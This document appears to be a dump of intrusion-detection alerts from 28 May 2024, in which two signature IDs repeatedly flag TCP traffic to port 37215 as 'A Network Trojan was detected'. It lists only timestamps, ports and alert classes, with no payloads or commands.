                  Timestamp:05/28/24-08:59:28.922780
                  SID:2835222
                  Source Port:45236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788927
                  SID:2829579
                  Source Port:53462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846085
                  SID:2829579
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.865651
                  SID:2829579
                  Source Port:51384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2829579
                  Source Port:33262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719829
                  SID:2835222
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887187
                  SID:2835222
                  Source Port:50196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656530
                  SID:2835222
                  Source Port:55892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817796
                  SID:2829579
                  Source Port:58136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848846
                  SID:2835222
                  Source Port:46898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627791
                  SID:2829579
                  Source Port:52656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786510
                  SID:2829579
                  Source Port:44290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489918
                  SID:2835222
                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628022
                  SID:2835222
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2829579
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492402
                  SID:2829579
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719364
                  SID:2835222
                  Source Port:45072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695164
                  SID:2835222
                  Source Port:42994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718854
                  SID:2829579
                  Source Port:57830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555388
                  SID:2835222
                  Source Port:54014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592762
                  SID:2829579
                  Source Port:39226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584580
                  SID:2835222
                  Source Port:58150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713780
                  SID:2829579
                  Source Port:48198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543456
                  SID:2829579
                  Source Port:41018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849256
                  SID:2835222
                  Source Port:45818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489888
                  SID:2835222
                  Source Port:46960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790201
                  SID:2829579
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843665
                  SID:2835222
                  Source Port:41874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780874
                  SID:2829579
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576812
                  SID:2829579
                  Source Port:54660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2835222
                  Source Port:43050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719155
                  SID:2829579
                  Source Port:53700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585804
                  SID:2829579
                  Source Port:47568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536245
                  SID:2829579
                  Source Port:55174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586132
                  SID:2829579
                  Source Port:40232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729807
                  SID:2829579
                  Source Port:43068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803742
                  SID:2829579
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2829579
                  Source Port:47276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576947
                  SID:2829579
                  Source Port:42542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2835222
                  Source Port:55596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.921651
                  SID:2829579
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888035
                  SID:2835222
                  Source Port:55110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785629
                  SID:2835222
                  Source Port:58738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696027
                  SID:2835222
                  Source Port:55432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729794
                  SID:2835222
                  Source Port:49400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545060
                  SID:2829579
                  Source Port:47140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696028
                  SID:2829579
                  Source Port:38460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780854
                  SID:2829579
                  Source Port:37082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278727
                  SID:2835222
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755579
                  SID:2835222
                  Source Port:48170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276235
                  SID:2829579
                  Source Port:38034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602386
                  SID:2829579
                  Source Port:36072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908564
                  SID:2829579
                  Source Port:37990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660541
                  SID:2829579
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794646
                  SID:2829579
                  Source Port:43288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720722
                  SID:2829579
                  Source Port:48990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547381
                  SID:2829579
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749958
                  SID:2829579
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665013
                  SID:2829579
                  Source Port:33580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660582
                  SID:2835222
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278396
                  SID:2835222
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790355
                  SID:2829579
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795418
                  SID:2835222
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537237
                  SID:2835222
                  Source Port:52988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607266
                  SID:2835222
                  Source Port:37598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788341
                  SID:2829579
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911294
                  SID:2835222
                  Source Port:34752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650638
                  SID:2835222
                  Source Port:38468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651694
                  SID:2829579
                  Source Port:41544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517515
                  SID:2829579
                  Source Port:32968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547325
                  SID:2829579
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586977
                  SID:2829579
                  Source Port:51808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923978
                  SID:2835222
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537246
                  SID:2829579
                  Source Port:49926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793474
                  SID:2835222
                  Source Port:55614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517482
                  SID:2829579
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720783
                  SID:2835222
                  Source Port:57962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874948
                  SID:2835222
                  Source Port:35680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277322
                  SID:2829579
                  Source Port:37592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594396
                  SID:2835222
                  Source Port:38842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628769
                  SID:2829579
                  Source Port:42876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886255
                  SID:2835222
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294451
                  SID:2835222
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488737
                  SID:2829579
                  Source Port:58490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2835222
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528961
                  SID:2829579
                  Source Port:57798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661312
                  SID:2829579
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911549
                  SID:2829579
                  Source Port:35034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920021
                  SID:2829579
                  Source Port:60450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316367
                  SID:2835222
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803718
                  SID:2835222
                  Source Port:51406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911678
                  SID:2835222
                  Source Port:40932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528902
                  SID:2829579
                  Source Port:52932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585516
                  SID:2829579
                  Source Port:55518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315986
                  SID:2835222
                  Source Port:51408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551729
                  SID:2829579
                  Source Port:60202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483000
                  SID:2835222
                  Source Port:57322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704295
                  SID:2829579
                  Source Port:42986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790717
                  SID:2829579
                  Source Port:56118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770955
                  SID:2835222
                  Source Port:38614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795253
                  SID:2835222
                  Source Port:53046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276843
                  SID:2829579
                  Source Port:54630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.590988
                  SID:2835222
                  Source Port:36150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293699
                  SID:2835222
                  Source Port:44076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767562
                  SID:2835222
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719360
                  SID:2835222
                  Source Port:45510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312379
                  SID:2829579
                  Source Port:50304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789843
                  SID:2829579
                  Source Port:58436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888291
                  SID:2835222
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907933
                  SID:2835222
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755612
                  SID:2835222
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660686
                  SID:2829579
                  Source Port:37238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.726469
                  SID:2835222
                  Source Port:59762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627823
                  SID:2829579
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2835222
                  Source Port:56086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889469
                  SID:2835222
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887500
                  SID:2829579
                  Source Port:49042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793596
                  SID:2829579
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316019
                  SID:2829579
                  Source Port:59974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923083
                  SID:2829579
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2829579
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906522
                  SID:2835222
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661697
                  SID:2829579
                  Source Port:38824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664483
                  SID:2829579
                  Source Port:33282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876907
                  SID:2835222
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696649
                  SID:2829579
                  Source Port:48652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719530
                  SID:2829579
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576099
                  SID:2829579
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594934
                  SID:2829579
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837201
                  SID:2829579
                  Source Port:51278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312387
                  SID:2829579
                  Source Port:41568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324125
                  SID:2835222
                  Source Port:60982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585430
                  SID:2829579
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695780
                  SID:2835222
                  Source Port:56280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704295
                  SID:2835222
                  Source Port:51232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885816
                  SID:2829579
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319924
                  SID:2829579
                  Source Port:33512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629671
                  SID:2835222
                  Source Port:49516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276274
                  SID:2835222
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585195
                  SID:2835222
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817802
                  SID:2829579
                  Source Port:56592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312348
                  SID:2829579
                  Source Port:47408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.512062
                  SID:2835222
                  Source Port:40334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799366
                  SID:2829579
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489243
                  SID:2835222
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555390
                  SID:2835222
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.884820
                  SID:2835222
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535997
                  SID:2829579
                  Source Port:47616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789490
                  SID:2835222
                  Source Port:56400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530406
                  SID:2835222
                  Source Port:33898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555940
                  SID:2829579
                  Source Port:48968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550669
                  SID:2829579
                  Source Port:43696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555319
                  SID:2835222
                  Source Port:51504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767772
                  SID:2835222
                  Source Port:37060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695231
                  SID:2835222
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649342
                  SID:2835222
                  Source Port:39168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785807
                  SID:2829579
                  Source Port:38446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586772
                  SID:2829579
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316576
                  SID:2835222
                  Source Port:60716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796563
                  SID:2835222
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.532179
                  SID:2829579
                  Source Port:35832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926390
                  SID:2835222
                  Source Port:48570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545119
                  SID:2829579
                  Source Port:52986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628932
                  SID:2835222
                  Source Port:35088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517536
                  SID:2835222
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496184
                  SID:2829579
                  Source Port:60558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660584
                  SID:2829579
                  Source Port:50264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651752
                  SID:2835222
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661335
                  SID:2835222
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604058
                  SID:2829579
                  Source Port:43516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278245
                  SID:2829579
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542751
                  SID:2829579
                  Source Port:59676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.297659
                  SID:2835222
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657746
                  SID:2829579
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.322583
                  SID:2829579
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.575606
                  SID:2829579
                  Source Port:51404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659264
                  SID:2829579
                  Source Port:46968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576828
                  SID:2835222
                  Source Port:33128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655677
                  SID:2835222
                  Source Port:60186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278391
                  SID:2829579
                  Source Port:57102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292813
                  SID:2835222
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2835222
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543714
                  SID:2835222
                  Source Port:40880
                  Destination Port:37215
                  Protocol:TCP
